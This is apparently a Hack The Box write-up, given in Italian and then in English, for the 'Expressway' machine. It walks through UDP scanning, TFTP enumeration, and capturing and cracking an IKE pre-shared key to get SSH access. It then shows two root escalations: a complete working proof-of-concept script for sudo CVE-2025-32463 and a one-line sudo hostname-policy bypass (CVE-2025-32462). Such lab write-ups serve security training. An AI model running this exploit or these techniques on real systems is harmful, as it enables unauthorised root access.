Expressway
Foothold
Si lancia nmap su porte TCP e solo la porta 22 è aperta. A questo punto si prova a fare una scansione UDP sulle porte top 25 e attraverso le informazioni recuperate si ottiene
sudo nmap -sC -sU --top-ports 25 -vv 10.10.11.87
[...]
PORT STATE SERVICE REASON
53/udp closed domain port-unreach ttl 63
67/udp closed dhcps port-unreach ttl 63
68/udp open|filtered dhcpc no-response
69/udp open tftp script-set
| tftp-version:
| cpe:
| cpe:/a:netkit:netkit
| cpe:/a:lefebvre:atftpd
|_ p: Netkit tftpd or atftpd
111/udp closed rpcbind port-unreach ttl 63
[...]
500/udp open isakmp udp-response ttl 63
| ike-version:
| attributes:
| XAUTH
|_ Dead Peer Detection v1.0
514/udp closed syslog port-unreach ttl 63
[...]
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 89.57 seconds
Raw packets sent: 227 (13.674KB) | Rcvd: 50 (4.282KB)
Le porte aperte risultano essere la 69 TFTP e 500 ISAKMP.
Proviamo con il servizio TFTP, acronimo di Trivial File Transfer Protocol, è un protocollo di rete semplice e leggero per il trasferimento di file. Andando ad eseguire uno script di nmap specifico per fare enumerazione su tftp, si scopre l’esistenza di un file ciscortr.cfg.
sudo nmap -sU -p 69 --script tftp-enum IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-06 15:58 CEST
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for expressway.htb (IP)
Host is up (0.053s latency).
PORT STATE SERVICE
69/udp open tftp
| tftp-enum:
|_ ciscortr.cfg
Nmap done: 1 IP address (1 host up) scanned in 44.35 seconds
Si esegue anche il modulo ausiliario di metasploit scanner/tftp/tftpbrute
msf auxiliary(scanner/tftp/tftpbrute) > options
Module options (auxiliary/scanner/tftp/tftpbrute):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
DICTIONARY /usr/share/metasploit-framewor yes The list of filenames
k/data/wordlists/tftp.txt
RHOSTS yes The target host(s), see https://docs.metasploit.com/d
ocs/using-metasploit/basics/using-metasploit.html
RPORT 69 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf auxiliary(scanner/tftp/tftpbrute) > set RHOSTS 10.10.11.87
RHOSTS => 10.10.11.87
msf auxiliary(scanner/tftp/tftpbrute) > run
[+] Found ciscortr.cfg on 10.10.11.87
[+] Found default.bin on 10.10.11.87
[+] Found lync.cfg on 10.10.11.87
[+] Found video-integration.cfg on 10.10.11.87
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Il file che risulta disponibile è ciscortr.cfg, gli altri sono falsi positivi.
All’interno di questo file ci sono diverse informazioni, l’unica informazione che sembra essere più importante è che risulta esserci un username (potrebbe essere quello a bordo della macchina)
username ike password *****
A questo punto ci si sposta sul servizio che gira sulla porta 500 isakmp, si lancia un ike-scan in aggressive mode, di modo che se il server abbia abilitata l’Aggressive Mode, risponda con informazioni utili.
sudo ike-scan -A IP
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
IP Aggressive Mode Handshake returned HDR=(CKY-R=74af0fb9c18517a6) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=[email protected]) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.277 seconds (3.61 hosts/sec). 1 returned handshake; 0 returned notify
Si evince che vengono utilizzati algoritmi deboli 3DES + SHA1, autenticazione con PSK, si envince anche l’ID [email protected] e altre informazioni utili.
Eseguendo il comando con il flag -P, il server genera la lista delle proposal. Invece, quando si riceve un handshake completo, stampa anche una riga detta “IKE PSK parameters”. In questa riga vengono concatenati i campi pubblici dello scambio con l’Aggressive Mode.
ike-scan -A -Ppsk.txt 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned HDR=(CKY-R=22ad962678c7ae5b) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=[email protected]) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.088 seconds (11.38 hosts/sec). 1 returned handshake; 0 returned notify
Nel file psk.txt è quindi presente un file hash, che rappresenta i campi citati sopra.
cat psk.txt
d23eed9e20ad2cc77d7d26503913843a5eb16fec948a105b352ca7267bb4f3df291013bb8e814662dfb83b27ccbfb256d6cfe7a0eca13e5be6f1e477568b9b9d0739cc2cf7de677506977785ed4273e73a9921161ee6519642122ef0f9adf3219cf6b0763bc89cec866970ea09d8b6637277ccbe7ec4c60a8d991ac8909d9d3c:a1dd89d78fa8a408ae673d629102b287e0485a3a2e4d8f677a110db37fb6db88df59bc35fa9b44d5c072c7de117945051a6e49f449bd8464a527923d32d37db4418edb60652c221312ac88f75eaa19d6beab55e8eaee1af8e6e9efa23358bbc12ade25d86a0e0c82c1ad1996b78095a4d3bb2599399461fc2c04150f2a3fd9ff:22ad962678c7ae5b:d40bda560f026f79:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:91b3419449cc8ecabb5204f8c2615b246b8e004f:56b7eeadf62ab4727b4927b1a35346697fd360c84e78e7e659e5587fa9c59427:4ee76074f1d3f57b74f7655de70a3466393c20de
Quindi, attraverso hashcat, si può provare a trovare la password che viene usata come chiave in derivazioni che coinvolgono questi dati pubblici.
hashcat.exe ../psk.txt "path\to\rockyou.txt"
hashcat (v7.1.2) starting in autodetect mode
OpenCL API (OpenCL 3.0 ) - Platform #1 [Intel(R) Corporation]
=============================================================
* Device #01: Intel(R) Iris(R) Xe Graphics, 3548/7096 MB (1774 MB allocatable), 8MCU
[...]:freakingrockstarontheroad
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5400 (IKE-PSK SHA1)
Hash.Target......: d23eed9e20ad2cc77d7d26503913843a5eb16fec948a105b352...3c20de
Time.Started.....: Tue Oct 07 11:22:10 2025 (2 secs)
Time.Estimated...: Tue Oct 07 11:22:12 2025 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
[...]
Started: Tue Oct 07 11:21:12 2025
Stopped: Tue Oct 07 11:22:12 2025
È stata ottenuta una password, quindi, le credenziali ottenute ora sono
ike:freakingrockstarontheroad
A questo punto si provano tali credenziali in SSH
ssh [email protected]
The authenticity of host '10.10.11.87 (10.10.11.87)' can't be established.
ED25519 key fingerprint is SHA256:fZLjHktV7oXzFz9v3ylWFE4BS9rECyxSHdlLrfxRM8g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.87' (ED25519) to the list of known hosts.
[email protected]'s password:
Last login: Tue Oct 7 09:48:45 BST 2025 from 10.10.14.50 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Oct 7 10:22:57 2025 from 10.10.14.147
ike@expressway:~$
Foothold ottenuto.
Privilege Escalation
Soluzione 1
Scaricando sulla macchina vittima lo script [linpeas.sh](http://linpeas.sh) si nota che è presente una versione vulnerabile di sudo CVE-2025-32463.
╔══════════╣ Sudo version
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version
Sudo version 1.9.17
La vulnerabilità consente agli utenti non privilegiati di richiamare chroot() su percorsi scrivibili e non attendibili sotto il loro controllo, che Sudo esegue con autorità di root.
La PoC dell’exploit mostrata qua sotto, permette quindi di eseguire la PE.
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}
Di conseguenza creando lo script ed eseguendolo si ottiene
ike@expressway:/tmp$ ./exploit.sh
woot!
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
Ora prendiamo e inviamo la flag root.txt.
Soluzione 2
Eseguendo il seguente comando, si ottiene una risposta non conforme a ciò che dovrebbe restituire, invece del solito testo “not in sudoers”:
ike@expressway:~$ sudo -l
[sudo] password for ike: <redacted>
Sorry, user ike may not run sudo on expressway.
Verificando effettivamente se si sta utilizzando una versione custom di sudo, si esegue
ike@expressway:~$ which sudo
/usr/local/bin/sudo
Quindi, siamo davanti ad un file binario custom root SUID.
Essendo anche utenti appartenenti al gruppo proxy, si vanno a verificare i log, in particolare, queli afferenti a squid.
ike@expressway:~$ ls -l /var/log/squid
-rw-r--r-- 1 proxy proxy 4778 Jul 23 01:19 access.log.1
ike@expressway:~$ cat /var/log/squid/access.log.1
...
1753229688.902 0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html
...
Leggendo i log si nota subito la presenza di un sottodominio interno offramp.expressway.htb.
A questo punto mettendo assieme i pezzi, si sospetta che sudo ha una policy basata sugli hostname. Difatti, eseguendo il seguente comando
ike@expressway:/tmp$ /usr/local/bin/sudo -h offramp.expressway.htb -i
root@expressway:~#
Note: se si effettua una ricerca sulle vulnerabilità di sudo 1.9.17, si trova la CVE-2025-32462 che fa riferimento a questo exploit. Inoltre, è presente una PoC qui della CVE in questione.
Foothold
We run nmap on the TCP ports and only port 22 is open. At this point we try a UDP scan against the top 25 ports, and from the information retrieved we get
sudo nmap -sC -sU --top-ports 25 -vv 10.10.11.87
[...]
PORT STATE SERVICE REASON
53/udp closed domain port-unreach ttl 63
67/udp closed dhcps port-unreach ttl 63
68/udp open|filtered dhcpc no-response
69/udp open tftp script-set
| tftp-version:
| cpe:
| cpe:/a:netkit:netkit
| cpe:/a:lefebvre:atftpd
|_ p: Netkit tftpd or atftpd
111/udp closed rpcbind port-unreach ttl 63
[...]
500/udp open isakmp udp-response ttl 63
| ike-version:
| attributes:
| XAUTH
|_ Dead Peer Detection v1.0
514/udp closed syslog port-unreach ttl 63
[...]
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 89.57 seconds
Raw packets sent: 227 (13.674KB) | Rcvd: 50 (4.282KB)
The open ports turn out to be 69 TFTP and 500 ISAKMP.
Let’s try the TFTP service: TFTP, short for Trivial File Transfer Protocol, is a simple, lightweight network protocol for transferring files. By running a specific nmap script to enumerate TFTP, we discover the existence of a file ciscortr.cfg.
sudo nmap -sU -p 69 --script tftp-enum IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-06 15:58 CEST
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for expressway.htb (IP)
Host is up (0.053s latency).
PORT STATE SERVICE
69/udp open tftp
| tftp-enum:
|_ ciscortr.cfg
Nmap done: 1 IP address (1 host up) scanned in 44.35 seconds
We also run the metasploit auxiliary module scanner/tftp/tftpbrute
msf auxiliary(scanner/tftp/tftpbrute) > options
Module options (auxiliary/scanner/tftp/tftpbrute):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
DICTIONARY /usr/share/metasploit-framewor yes The list of filenames
k/data/wordlists/tftp.txt
RHOSTS yes The target host(s), see https://docs.metasploit.com/d
ocs/using-metasploit/basics/using-metasploit.html
RPORT 69 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf auxiliary(scanner/tftp/tftpbrute) > set RHOSTS 10.10.11.87
RHOSTS => 10.10.11.87
msf auxiliary(scanner/tftp/tftpbrute) > run
[+] Found ciscortr.cfg on 10.10.11.87
[+] Found default.bin on 10.10.11.87
[+] Found lync.cfg on 10.10.11.87
[+] Found video-integration.cfg on 10.10.11.87
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The file that turns out to be available is ciscortr.cfg; the others are false positives.
This file contains various pieces of information. The only one that seems to be more important is that there appears to be a username (it might be one present on the machine)
username ike password *****
At this point we move on to the service running on port 500 isakmp. We launch an ike-scan in aggressive mode, so that if the server has Aggressive Mode enabled, it responds with useful information.
sudo ike-scan -A IP
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
IP Aggressive Mode Handshake returned HDR=(CKY-R=74af0fb9c18517a6) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=[email protected]) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.277 seconds (3.61 hosts/sec). 1 returned handshake; 0 returned notify
We can see that weak algorithms are used, 3DES + SHA1, with PSK authentication. We also infer the ID [email protected] and other useful information.
Running the command with the -P flag, the server generates the list of proposals. When a complete handshake is received instead, it also prints a line called “IKE PSK parameters”. In this line the public fields of the Aggressive Mode exchange are concatenated.
ike-scan -A -Ppsk.txt 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned HDR=(CKY-R=22ad962678c7ae5b) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=[email protected]) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.088 seconds (11.38 hosts/sec). 1 returned handshake; 0 returned notify
The psk.txt file therefore contains a hash, which represents the fields mentioned above.
cat psk.txt
d23eed9e20ad2cc77d7d26503913843a5eb16fec948a105b352ca7267bb4f3df291013bb8e814662dfb83b27ccbfb256d6cfe7a0eca13e5be6f1e477568b9b9d0739cc2cf7de677506977785ed4273e73a9921161ee6519642122ef0f9adf3219cf6b0763bc89cec866970ea09d8b6637277ccbe7ec4c60a8d991ac8909d9d3c:a1dd89d78fa8a408ae673d629102b287e0485a3a2e4d8f677a110db37fb6db88df59bc35fa9b44d5c072c7de117945051a6e49f449bd8464a527923d32d37db4418edb60652c221312ac88f75eaa19d6beab55e8eaee1af8e6e9efa23358bbc12ade25d86a0e0c82c1ad1996b78095a4d3bb2599399461fc2c04150f2a3fd9ff:22ad962678c7ae5b:d40bda560f026f79:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:91b3419449cc8ecabb5204f8c2615b246b8e004f:56b7eeadf62ab4727b4927b1a35346697fd360c84e78e7e659e5587fa9c59427:4ee76074f1d3f57b74f7655de70a3466393c20de
So, using hashcat, we can try to find the password that is used as a key in derivations involving this public data.
hashcat.exe ../psk.txt "path\to\rockyou.txt"
hashcat (v7.1.2) starting in autodetect mode
OpenCL API (OpenCL 3.0 ) - Platform #1 [Intel(R) Corporation]
=============================================================
* Device #01: Intel(R) Iris(R) Xe Graphics, 3548/7096 MB (1774 MB allocatable), 8MCU
[...]:freakingrockstarontheroad
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5400 (IKE-PSK SHA1)
Hash.Target......: d23eed9e20ad2cc77d7d26503913843a5eb16fec948a105b352...3c20de
Time.Started.....: Tue Oct 07 11:22:10 2025 (2 secs)
Time.Estimated...: Tue Oct 07 11:22:12 2025 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
[...]
Started: Tue Oct 07 11:21:12 2025
Stopped: Tue Oct 07 11:22:12 2025
A password was obtained, so the credentials we now have are
ike:freakingrockstarontheroad
At this point we try these credentials over SSH
ssh [email protected]
The authenticity of host '10.10.11.87 (10.10.11.87)' can't be established.
ED25519 key fingerprint is SHA256:fZLjHktV7oXzFz9v3ylWFE4BS9rECyxSHdlLrfxRM8g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.87' (ED25519) to the list of known hosts.
[email protected]'s password:
Last login: Tue Oct 7 09:48:45 BST 2025 from 10.10.14.50 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Oct 7 10:22:57 2025 from 10.10.14.147
ike@expressway:~$
Foothold obtained.
Privilege Escalation
Solution 1
By downloading the [linpeas.sh](http://linpeas.sh) script onto the victim machine, we notice that a vulnerable version of sudo CVE-2025-32463 is present.
╔══════════╣ Sudo version
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version
Sudo version 1.9.17
The vulnerability allows unprivileged users to invoke chroot() on writable, untrusted paths under their control, which Sudo executes with root authority.
The exploit PoC shown below therefore allows us to perform the PE.
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}
As a result, by creating the script and running it we get
ike@expressway:/tmp$ ./exploit.sh
woot!
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
Now let’s grab and submit the root.txt flag.
Solution 2
By running the following command, we get a response that does not match what it should return, instead of the usual “not in sudoers” text:
ike@expressway:~$ sudo -l
[sudo] password for ike: <redacted>
Sorry, user ike may not run sudo on expressway.
To actually verify whether a custom version of sudo is being used, we run
ike@expressway:~$ which sudo
/usr/local/bin/sudo
So we are dealing with a custom root SUID binary.
Since we are also a user belonging to the proxy group, we go and check the logs, in particular those related to squid.
ike@expressway:~$ ls -l /var/log/squid
-rw-r--r-- 1 proxy proxy 4778 Jul 23 01:19 access.log.1
ike@expressway:~$ cat /var/log/squid/access.log.1
...
1753229688.902 0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html
...
Reading the logs, we immediately notice the presence of an internal subdomain offramp.expressway.htb.
At this point, putting the pieces together, we suspect that sudo has a hostname-based policy. In fact, running the following command
ike@expressway:/tmp$ /usr/local/bin/sudo -h offramp.expressway.htb -i
root@expressway:~#
Note: if you search for vulnerabilities in sudo 1.9.17, you find CVE-2025-32462, which refers to this exploit. There is also a PoC here for the CVE in question.